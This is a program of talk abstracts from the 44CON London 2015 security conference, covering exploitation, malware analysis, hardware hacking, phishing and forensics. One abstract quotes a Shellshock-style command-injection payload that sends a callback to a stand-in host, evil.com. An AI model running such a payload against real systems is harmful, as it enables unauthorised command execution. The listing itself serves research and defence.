44CON LONDON 2015 Presentations

Most of the presentations are available to view on Vimeo.

Meterpreter: Understanding the New Shiny

Presented By: OJ Reeves

The last couple of years have seen Meterpreter move forward leaps and bounds when it comes to new features and stability. Metasploit users worldwide continue to make use of it for its core feature set that is already well known, but are yet to benefit from the new features that are starting to make it a more compelling tool for red team engagements.

The goal of this talk will be to bring people up to speed on how Meterpreter has changed, evolved and become what it is in 2015. Old features will be covered, and new features will be discussed in depth, with a focus on how those new features can be used to help red teamers establish and maintain a stronger foothold in their target’s network.

This presentation will not only discuss the features at a high level, but will also dive deeper into some of the more technical details around the new and more interesting features, including stageless payloads, transport modification, paranoid mode, and persistence. It will also cover some of the common pitfalls that cause shells to fail, and how to avoid them.

It may even cover a sneak peak of what’s to come further down the track!

Windows 10: 2 Steps Forward, 1 Step Back

Presented By: James Forshaw

Windows 10 is shaping up to be one of the most secure consumer operating systems yet, it includes many new security features baked in such as Control Flow Guard and Credentials Isolation. But new features have a habit of coming with additional bugs which only serve to reduce the security of the system at the same time.

This presentation will describe a few of the new security features introduced into Windows 10 as well as some of the vulnerabilities I’ve discovered which demonstrate that secure engineering is still very difficult in practice.

Exploiting 64-bit IE on Windows 8.1 – The Pwn2Own Case Study

Presented By: Yuki Chen and Linan Hao

Instead of 32-bit IE, this year’s Pwn2Own competition selected 64-bit Internet Explorer as the target for the first time. 64-bit IE brings new challenges to exploit writers, for example, simple heap spraying technique will not work in 64-bit process. And in order to win the game, we also need to bypass the control flow guard (CFG) mitigation on windows 8.1 as well as the enhanced protected mode (EPM) sandbox of IE.

In this presentation, we will disclose the details of the 2 vulnerabilities we used to take down 64-bit IE in Pwn2Own 2015 for the first time. We will go through the poc exploit to demonstrate the techniques we used to work out a working IE 64-bit exploit. We will show how we achieved ASLR & CFG bypass and remote code execution in 64-bit IE with a single uninitialized memory bug. We will also discuss the bug we used to bypass IE’s EPM sandbox to achieve elevation of privilege.

Barbarians At The Gate(way): An Examination Of The Attacker’s Tool Box

Presented By: Dave Lewis

This talk will examine the tools, methods and data behind the DDoS attacks that are prevalent in the news headlines. Using information collected, the presentation will demonstrate what the attackers are using to cause their mischief & mayhem, and examine the timeline and progression of attackers as they move from the historical page defacers to the motivated DDoS attacker.

We will look at the motivations and rationale that they have and try to share some sort of understanding as to what patterns to be aware of for their own protection.

Smart Muttering; a story and toolset for smart meter platform

Presented By: Ian de Villiers

The use of smart meters and their associated technologies is becoming more widespread as utility providers struggle to deal with ever growing demand and scarcer resources. The European Union has deployed over 46 million smart meters to date, with an additional 119 million smart meters intended to be deployed in member countries by 2019. Likewise, in the United States of America, there are indications that the number of smart meters deployed had topped the 50 million mark in middle July, 2014.

Previous work has shown security and privacy concerns with smart metering specifically, with researchers at IOActive even developing a “Smart Grid Worm”. However, this work has done little to open either smart meter research to a wider audience, or provide tools for approaching new platforms and devices.

To address this, we developed a pluggable framework and easy-to-build low-cost hardware platform for embedded device protocol analysis and manipulation. Both of which will be released under an open-source license during the talk.

Whilst smart devices have been developed for managing resources, their functionality has also been found to be applicable to other spheres, resulting in technologies (based on, or similar to smart technologies) often being found in other applications. Some smart device platforms are also used in process management applications, and even transport management systems. The resources governed by these systems are regarded as critical infrastructure by most governments. Disruption of these systems could result in significant damage to national infrastructure – or even political instability in a region targeted by attackers. In addition to smart networks, the advent of the so-called “Internet of Things”, has added a plethora of new devices to home networks. Thus these technologies are responsible for securing access to both nation-state as well as residential resources, making research in this area an important concern.

Given the present and growing criticality of these devices, we embarked on a lengthy assessment of the popular LonMark platform as implemented in the Echelon Series 5000-based devices with the aim of discovering platform-wide vulnerabilities that could be used to attack devices or their backend management platforms.

However, no to very little tools exist for assessing devices making use of obscure networks or protocols. Currently, attacking smart meters, interconnected hardware and associated applications – is not as simple as firing up a web proxy and intercepting traffic, as is the case with web applications, something this talk hopes to change. In most cases, the devices communicate over mediums researchers may not be familiar with and may use custom protocols, resulting in difficulties obtaining access to network communication streams.

To counter these obstacles, I will present various mechanisms for assessing the security of obscure networks, protocols and devices. This will be performed using off-the-shelf hardware and a custom framework for conducting this type of work.

This toolset, the result of thousands of hours worth of research, will provide functionality for conducting traditional sniffing, replay and fuzzing attacks against devices making use of wired connections. Using this framework, the analyst will practically demonstrate attacks against the smart devices used during the course of this research.

How to drive a malware analyst crazy

Presented By: Michael Boman

This talk will discuss the different methods malware authors use to complicate the malware forensics / reverse engineering. It will discuss both the history of anti-forensics and what is being used today.

Playing with Fire: Attacking the FireEye MPS

Presented By: Felix Wilhelm

This talk will give an overview of a number of vulnerabilities in FireEye’s Malware Protection System (MPS) that were recently discovered (and which are patched in the interim). These range from command injections in the management web interface over local privilege escalation vulnerabilities to exploits that allow a full compromise of the system by simply sending a malicious file over the network and exploiting bugs in the analysis process.

We will discuss the inherent attack exposure of certain types of network security controls, together with architectural recommendations how those could be addressed.

Is there an EFI monster inside your apple?

Presented By: Pedro Vilaça

I publicly disclosed an Apple EFI firmware zero day.

It was a very powerful bug allowing direct access to the EFI firmware from the operating system. EFI rootkits are some of the most powerful and most interesting rootkits. Because they work at a very low level they can play a lot of tricks to hide themselves from forensics and persist for a long time.

EFI monsters are a bit like jaguars, stealthy and rarely seen by humans. This doesn’t mean they do not exist. EFI monsters are most certainly part of spy agencies rootkits catalog. Very few tools exist to chase them.

This talk is about introducing you to the EFI world so you can also start to chase these monsters. EFI world might look scary but it’s a bit easier than you think and a lot of fun.

DDoS mitigation EPIC FAIL collection

Presented By: Moshe Zioni

I have been researching DDoS attacks and mitigation techniques for the past three years and worked with industry leaders on testing their systems, providing them with cutting edge, and even never-seen-before attacks.

I was amazed (actually still am) to find out that those big corporations, investing much work into their architecture of defense came to FAIL and sometimes the sole reason for a successful attack was a mitigation configuration or architecture FAIL. My research is done by utilizing smart grids of computers, mimicking vast botnets from all over the world, writing and perfecting scripted attacks and even involve social engineering attempts within those attacks (for mitigation that involve manual intervention). In the presentation there will be a showcase of 10 such FAILs, detailed technically as for a step-by-step close follow on the attack strategy and its mitigation failing, and of course – how delving into a recommended setup for a proper mitigation technique that will not inflict such a direct damage as presented.

Jtagsploitation: 5 wires, 5 ways to root

Presented By: Joe FitzPatrick & Matt King

JTAG comes up in nearly every hardware-related hack. In order to do anything via JTAG, you generally need a hardware debugging device that connects to anything from a standard header to undocumented test points scattered around a device. JTAG access is almost always ‘game over’ but it’s not always clear how to turn that hardware access into privileged software access on the system.

This talk will enumerate a number of different ways to turn a ‘check’ for jtag access into the ‘checkmate’ of root shell access. Each example will demonstrate a unique method for getting root access via JTAG. Each method is also general enough to be broadly applicable across different hardware architectures and implementations. Example code and scripts will be released at the talk.

Hunting Asynchronous Vulnerabilities

Presented By: James Kettle

In blackbox tests vulnerabilities can lurk out of sight in backend functions and background threads. Issues with no visible symptoms like blind second order SQL injection and shell command injection via nightly cronjobs or asynchronous logging functions can easily survive repeated pentests and arrive in production unfixed.

The only way to reliably hunt these down is using exploit-induced callbacks. That is, for each potential vulnerability X send an exploit that will ping your server if it fires, then patiently listen.

In this presentation, I’ll show that exploit-induced callbacks can be taken far beyond () { :;}; echo 1 > /dev/udp/evil.com/53 to find blind and asynchronous XXE, (DOM)XSS, SQli, SMTP and even pure XML injection. I’ll examine a range of techniques to coax applications into issuing a callback by any means possible. These will start out clean and simple and quickly degenerate into crude cross-technology/platform multi-context exploit chains, some of which are definitely not advisable for production servers.

This presentation will also cover coping strategies for some of the innate hazards associated with hosting the infrastructure required to automate finding these vulnerabilities.

Old Dog, New Tricks: Forensics With PowerShell

Presented By: Jared Atkinson

Recent intrusion into the networks of organizations like Office of Personnel Management, Sony, JPMorgan Chase, and British Airways have shown that the question isn’t “if” your organization will be targeted, but “when”. With these attacks and many others in recent years, incident response teams have had to rapidly change tactics from the “image-and-forget” methodology to live box forensics and containment. During these engagements, forensic analysts must actively track and monitor an adversary in their network while preventing the adversary from recognizing detection but most tools are not up to the job. PowerShell brings the flexibility and in-memory nature to defenders to tackle live threats.

In this workshop, I will cover how my project, PowerForensics, can provide the Digital Forensics/Incident Response community with an all in one toolset for attack response and investigation. By leveraging PowerShell’s access to the Windows API and .NET framework, PowerForensics provides investigators with a forensically sound “live” investigation platform without the need to image the hard drive. I’ll cover the background and overview of PowerForensics, including how its various capabilities can facilitate the investigation of advanced actors at scale. Finally, I’ll cap off with a complex demo, showing how PowerForensics can help blue teams investigate the real attacks they’re now facing. PowerShell isn’t just for the red team anymore.

Inside Terracotta VPN

Presented By: Kent Backman

Virtual Private Networks (VPN) are very popular. They are part and parcel for almost every enterprise network, especially those with remote employees. Aside from VPNs for enterprises, there are many reputable commercial VPN services that offer low cost, reliable service to individual users. These users employ VPNs for reasons that might include connection security, protection of privacy data, online gaming acceleration, and bypassing service provider restrictions. VPN’s are also popular with cyber criminals, as it is one way the latter can obscure their true source location. When a commercial VPN service provider uses resources such as servers and copious bandwidth stolen or repurposed from unsuspecting victims for purposes of profit, the offering clearly crosses into the criminal domain. In this report, FirstWatch exposes one such operator doing business with multiple VPN brand names out of the People’s Republic of China (PRC). At last count, the Terracotta VPN node ecosystem consisted of more than 1500 systems around the globe. Every Windows server running as a Terracotta VPN node that FirstWatch was able to verify was hacked.

The operators behind Terracotta VPN continue their broad campaign to compromise multiple victim organizations around the world. Meanwhile, advanced threat actors such as Shell_Crew (Google RSA Shell_Crew for details) use Terracotta VPN to anonymize their activity while they hack the crap out of governments and commercial entities around the world. While RSA has yet to release the paper to the public, an earlier version of Inside Terracotta VPN was presented to Microsoft’s invitation-only Digital Crimes Consortium (DCC 2105) conference in Miami. This presenter will share with the 44CON London audience otherwise non-public information previously restricted to law enforcement on how this was discovered, and other stuff not appearing in the paper to be released by RSA (this summer).

Hackers in the Wire and Drones Oh My!

Presented By: Philip Polstra

At the second 44CON Phil debuted The Deck, a penetration testing Linux distro for the BeagleBoard, BeagleBone, BeagleBone Black, and similar small computing devices. In this talk you will learn how to perform very powerful, yet inexpensive, penetration tests with an army of low-power ARM-based devices connected via a wireless, out-of-band, network. These devices range from wired/wireless dropboxes, to wired/wireless remote hacking drones, to flying remote hacking drones, to taps installed inline in the target’s data center. All of the action can be controlled from up to a mile away (Phil recommends poolside at a nearby hotel) or from anywhere in the world using gateways.

Devices to be discussed include the BeagleBone Black, BeagleBoard xM, BeagleBoard X15, the Little Universal Network Appliance (LUNA), the Raspberry Pi 2, and aerial delivery platforms.

Attacking VxWorks: from Stone Age to Interstellar

Presented By: Yannick Formaggio

VxWorks is the world’s most widely-used real-time operating system deployed in embedded systems. Its market reach spans across all safety critical fields, including the Mars Curiosity rover, Boeing 787 Dreamliner, network routers to name a few. The safety critical nature of these applications make VxWorks security a major concern.

Our team has conducted a thorough security analysis on VxWorks, including its supported network protocols and OS security mechanism. We will present the tool we developed for VxWorks assessment. The main goal of our tool is to provide effective penetration testing by implementing the WdbRPC protocol in python. To show its effectiveness, we are going to reveal some of the bugs we discovered along the way.

Finally, we will wrap up by demonstrating the vulnerability we found that allows remote code execution on most VxWorks based devices. A quick Internet scan shows that at least 100k devices running VxWorks are connected to the Internet. Considering the popularity of VxWorks in the age of IoT, this issue will have a widespread impact.

reverse reverse engineering

Presented By: Richo Healey

Richo will walk attendees through the basic architecture of a traditional AOT compiler and runtime loader, and describe the parallels between this and the operation of a modern bytecode VM (python, ruby, etc). With this newfound knowledge, we’ll tackle implementing a tool to reverse engineer a sample of obfuscated ruby. However, instead of analyzing the bytecode directly, we will instead implement a malicious, but otherwise fully functional VM, and use that to explore the various anti-analysis tricks deployed.

By the end of the talk, you will have extended insight into the conceptual inner workings of a compiler, and feel equipped to implement substitutes for the interesting parts of a traditional compilation/loader pipeline to trick opaque objects into telling you how they work, instead of the other way around. While the demos will focus on ruby, the techniques demonstrated are equally applicable to python, etc.

MITMf: Bringing Man-In-The-Middle attacks to the 21’st century

Presented By: Marcello Salvati

Tired of managing countless scripts for automating your Man-In-The-Middle attacks?

Have a cool idea for a MITM attack, but don’t want to spend hours writing a script from scratch?

Tired of bashing your head against the wall trying to figure out why Ettercap’s filters are not working?

Well look no further!

MITMf combines new and old MITM techniques into a framework! Written in Python, It’s built to be extremely extendible and reliable , while updating the current MITM attacks for the 21st century!

Dark Fairytales from a Phisherman (Vol.II)

Presented By: Michele Orru

Phishing attacks are a prevalent threat against large or small organisations. As professionals in the security field we need to be able to give our clients the look and feel of what a real “bad guy” may do to attack an organisation.

Leverage Phishing Frenzy and BeEF on your next engagement to ensure your client is getting the most out of their assessment. With simple templates you can launch an effective phishing campaign in minutes, and thanks to the BeEF integration you’ll be hooking and exploiting browsers in no time.

Have you ever wondered what is the best pretext to use during your phishing campaign use-case? What about timeframes? We’ll discuss statistics based on real-world professional phishing engagements. We’ll also entertain you with fun (and real) hacking stories involving phishing and client-side exploitation.

Reverse engineering and exploiting font rasterizers: the OpenType saga

Presented By: Mateusz Jurczyk

Font rasterization software is clearly among the most desirable attack vectors of all time, due to multiple reasons: the wide variety of font file formats, their significant structural and logical complexity, typical programming language of choice (C/C++), average age of the code, ease of exploit delivery and internal scripting capabilities provided by the most commonly used formats (TrueType and OpenType). As every modern widespread browser, document viewer and operating system is exposed to processing external, potentially untrusted fonts, this area of security has a long history of research. As a result, nearly every major vendor releases font-related security advisories several times a year, yet we can still hear news about more 0-days floating in the wild.

Over the course of the last few months, we performed a detailed security audit of the implementation of OpenType font handling present in popular libraries, client-side applications and operating systems, which appears to have received much less attention in comparison to e.g. TrueType. During that time, we discovered a number of critical vulnerabilities, which could be used to achieve 100% reliable arbitrary code execution, bypassing all currently deployed exploit mitigations such as ASLR, DEP or SSP. More interestingly, a number of those vulnerabilities were found to be common across various products, enabling an attacker to create chains of exploits consisting of a very limited number of distinct security bugs.

The presentation will outline the current state of the art with regards to font security research, in the context of how the overall field of typography has evolved over the years, both back in the 80’s and 90’s and the more recent times, including the connections and ties between various font engines seen today. Following the enumeration of potential attack surfaces, we will discuss the process of reverse-engineering widespread proprietary OpenType/CFF implementations such as the Windows kernel ATMFD.DLL module (Adobe Type Manager Font Driver), and provide an in-depth analysis of the root cause and reliable exploitation process of vulnerabilities discovered in products such as Microsoft Windows, Adobe Reader, DirectWrite (Internet Explorer), FreeType and others.

15-Minute Linux Incident Response Live Analysis

Presented By: Philip Polstra

This presentation will show attendees how to perform an initial live analysis of a Linux system in mere minutes. The focus of the talk will be a set of shell scripts that allow an investigator to quickly make a determination as to whether or not an incident has occurred without the need to shutdown the system to perform traditional dead analysis.

Within 15 minutes the investigator should have a rough idea of what has transpired and will be in a better position to determine if dead analysis is warranted. The shell scripts presented minimize the disturbance to the system and send all information to a forensics workstation over the network.

Nothing beyond basic Linux knowledge (user not administrator) is required of attendees. Attendees will leave with some tools for live analysis and also a good introduction to shell scripting for those that are new to this topic.

A Trek to the Emerald City: Ring -1 Based AV

Presented By: Shift

To compete in the endless race against rootkits, antivirus software vendors are slowly starting to use the Virtualization Extensions offered by commodity CPUs.

The attack surface of AV software has been has been large enough until now, but hypervisor-based AV solutions expose a whole new attack surface. By exploiting flaws in AV software, instead of Ring 0 control or full Administrator privileges, it is now possible to gain Ring -1 permissions, an almost jackpot-like Ring which allows controlling the Virtualization Extensions our CPUs employ.

This talk takes us into the realm of Hypervisor based AVs, to see how well they’ve managed to walk in the depths or Ring -1 in their attempts to implement a thin hypervisor layer to help in the fight against rootkits. track: Offence

Get in the Ring0 – Understanding Windows drivers

Presented By: Graham Sutherland

Separate your IRPs from your IRQLs, people, it’s time to learn about Windows drivers. Turns out they’re not magic. Who knew?

Going AUTH the Rails on a Crazy Train

Presented By: Tomek Rabczak & Jeff Jarmoc

Rails has a strong foundation in convention over configuration. In this regard, Rails handles a lot of security related conventions for developers, keeping them safe from vulnerabilities such as SQL Injection, XSS, and CSRF out of the box. However, authentication and authorization logic is largely left up to the developer. It is here that the abilities of the framework hit the end of the track and it’s up to the developers to keep themselves safe. In this talk, we take a look at patterns that we’ve seen across some of the largest Rails applications on the internet and cover common pitfalls that you as a security researcher and/or developer can watch out for. We will also be discussing and releasing a new dynamic analysis tool for Rails applications to help pentesters navigate through authentication and authorization solutions in Rails.

Responsible disclosure: who cares?

Presented By: OJ Reeves & Dan Tentler

Both OJ and Dan have been conducting security assessments for years. Occasionally a discovery is made which warrants discreetly contacting the vendor in question to let them know several thousand (or million) of their devices have a major vulnerability. Sometimes the vendor takes notice and subsequently takes action, however sadly on most occasions they either feign effort, completely ignore the researcher, or openly say ‘go away’. These are a couple stories of how responsible disclosure was attempted, but the company in question couldn’t be troubled to help themselves.

Dan will articulate the story of events surrounding the recent goatse-ing of a sign in Atlanta, Georgia. LED billboards are apparently just like every other “IoT” style device – completely open, completely public, you just have to know where to look. A little shodanning and one can find any number of colorful things on the internet. Dan will tell the story about his attempts to notify this sign company shortly before they got goatse’d, their interactions before and after and the demeanor in which one can conduct oneseself when going about turning a security disclosure into a conference talk. We will check live on stage to see how many of these things still exist, as well.

OJ will tell a horrible tale of his first ever disclosure experience, one that involved a very large vendor of consumer storage products. The story consists of initial vulnerability discovery, analysis, and exploitation, and then leads into what seemed like an endless back-and-forth with the vendor over a series of months. There were lows, and there were highs. The former outnumbered the latter. There was much derp! All will be shared in its lulzy glory, in gory detail, up to and including a discussion with the vendor’s CSO. The story will end with an opinion. A strong one. OJ will also be trawling shodan to show how many boxes are still vuln. He will be going through the exploit step by step and explaining how things were discovered.

Software Defined Networking (SDN) Security

Presented By: David Jorm

SDN is rapidly moving from R&D to production deployment, with some frightening security implications. This presentation will provide an overview of emerging SDN technologies, the attack surfaces they expose, and the kinds of vulnerabilities that have already been discovered in popular SDN controllers. A live demo of several exploits will show the potential security implications of deploying SDN in production today. Finally we will look at some efforts currently underway to improve the security of SDN controllers.

Forging the USB armory

Presented By: Andrea Barisani

The availability of modern System on a Chip (SoC) parts, having low power consumption and high integration of most computer components in a single chip, empowers the open source community in creating all kind of embedded systems.

The presentation illustrates the journey that we have taken to develop an open hardware board first of its kind: the USB armory, an open source hardware design, implementing a flash drive sized computer for security applications.

The security features of the USB armory System on a Chip (SoC), combined with the openness of the board design, is meant to empower developers and users with a fully customizable USB trusted device for open and innovative personal security applications.

The presentation explores the lessons learned in making a small form factor, high specifications, embedded device with solely open source tools, its architecture and security features such as secure boot and ARM TrustZone implementation.

The security applications of the implemented concept are explored, illustrating the advantage of an open USB device with increased computational power.

The first open source application for the platform, developed by Inverse Path, for advanced file encryption functionality, will also be covered.

Stegosploit – Drive-by Browser Exploits using only Images

Presented By: Saumil Shah

“A good exploit is one that is delivered with style”.

Stegosploit creates a new way to encode “drive-by” browser exploits and deliver them through image files. These payloads are undetectable using current means. This paper discusses two broad underlying techniques used for image based exploit delivery – Steganography and Polyglots. Drive-by browser exploits are steganographically encoded into JPG and PNG images. The resultant image file is fused with HTML and Javascript decoder code, turning it into an HTML+Image polyglot. The polyglot looks and feels like an image, but is decoded and triggered in a victim’s browser when loaded.